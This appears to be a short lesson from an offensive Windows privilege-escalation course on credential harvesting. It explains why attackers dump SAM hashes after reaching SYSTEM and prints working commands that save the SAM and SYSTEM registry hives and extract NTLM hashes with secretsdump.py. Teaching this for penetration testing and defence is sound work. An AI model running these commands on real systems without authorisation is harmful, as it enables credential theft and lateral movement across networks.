Credential Harvesting
Dump secrets.
Why Harvest Credentials?
Even after reaching SYSTEM, the real prize is often credentials — password hashes, plaintext passwords, and tickets that let you move laterally and reach the domain. Credential harvesting turns one box into the whole network.
The SAM Database
Local account hashes live in the SAM registry hive, encrypted with a key in the SYSTEM hive. With SYSTEM access you can dump both and extract NTLM hashes offline.
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCALAll lessons in this course
- Windows Enumeration
- Service Misconfigurations
- Token Impersonation
- Credential Harvesting